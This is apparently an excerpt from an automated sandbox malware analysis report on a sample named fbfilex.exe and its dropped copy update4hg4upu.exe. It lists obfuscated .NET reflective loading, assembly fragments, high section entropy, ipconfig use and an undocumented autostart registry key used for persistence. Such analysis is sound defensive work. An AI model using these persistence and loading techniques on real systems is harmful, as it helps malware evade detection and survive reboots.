          Source: 1.2.fbfilex.exe.970000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.fbfilex.exe.970000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.fbfilex.exe.360000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.fbfilex.exe.360000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.fbfilex.exe.950000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.2.fbfilex.exe.950000.1.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: update4hg4upu.exe.4.dr, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 24.0.update4hg4upu.exe.350000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 24.2.update4hg4upu.exe.350000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 27.2.update4hg4upu.exe.aa0000.1.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 27.0.update4hg4upu.exe.aa0000.0.unpack, d?l?rFw??/hw??uC?U?Gc.cs, .Net Code: Eo??f??N?o?? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\fbfilex.exe, Code function: 1_2_053E34AF push edi; retf 1_2_053E34B1
          Source: C:\Users\user\Desktop\fbfilex.exe, Code function: 1_2_053E34A5 push edi; retf 1_2_053E34A7
          Source: C:\Users\user\Desktop\fbfilex.exe, Code function: 3_2_0040E37F push ds; iretd 3_2_0040E3C1
          Source: C:\Users\user\Desktop\fbfilex.exe, Code function: 3_2_0040E335 push ds; iretd 3_2_0040E3C1
          Source: C:\Users\user\Desktop\fbfilex.exe, Code function: 3_2_00416C6C pushfd ; iretd 3_2_00416C6D
          Source: C:\Users\user\Desktop\fbfilex.exe, Code function: 3_2_0040E416 pushad ; ret 3_2_0040E41D
          Source: C:\Users\user\Desktop\fbfilex.exe, Code function: 3_2_0041CDF5 push eax; ret 3_2_0041CE48
          Source: C:\Users\user\Desktop\fbfilex.exe, Code function: 3_2_0041CE42 push eax; ret 3_2_0041CE48
          Source: C:\Users\user\Desktop\fbfilex.exe, Code function: 3_2_0041CE4B push eax; ret 3_2_0041CEB2
          Source: C:\Users\user\Desktop\fbfilex.exe, Code function: 3_2_0041CEAC push eax; ret 3_2_0041CEB2
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 24_2_04DD9CD2 push FFFFFF94h; ret 24_2_04DD9CD4
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 24_2_04DD34AF push edi; retf 24_2_04DD34B1
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 24_2_04DD34A5 push edi; retf 24_2_04DD34A7
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 24_2_04DD9ED2 push edi; iretd 24_2_04DD9ED9
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 24_2_04DD6E1F pushfd ; retf 24_2_04DD6E23
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 24_2_04DD1750 push 2C02777Fh; iretd 24_2_04DD1755
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 24_2_04DDB11C push edx; retf 24_2_04DDB11E
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 24_2_04DDB112 push edx; retf 24_2_04DDB114
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 27_2_0040E37F push ds; iretd 27_2_0040E3C1
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 27_2_0040E335 push ds; iretd 27_2_0040E3C1
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 27_2_00416C6C pushfd ; iretd 27_2_00416C6D
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 27_2_0040E416 pushad ; ret 27_2_0040E41D
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 27_2_0041CDF5 push eax; ret 27_2_0041CE48
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 27_2_0041CE42 push eax; ret 27_2_0041CE48
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 27_2_0041CE4B push eax; ret 27_2_0041CEB2
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe, Code function: 27_2_0041CEAC push eax; ret 27_2_0041CEB2
          Source: initial sample, Static PE information: section name: .text entropy: 7.85113271284

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: unknown, Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\explorer.exe, File created: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe
          Source: C:\Windows\explorer.exe, File created: C:\Users\user\AppData\Local\Temp\Kx2ad\update4hg4upu.exe

          Boot Survival:

          Creates an undocumented autostart registry key
          Source: C:\Windows\SysWOW64\msdt.exe, Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run T8TP5LRPRP
          Source: C:\Users\user\Desktop\fbfilex.exe, Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe, Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX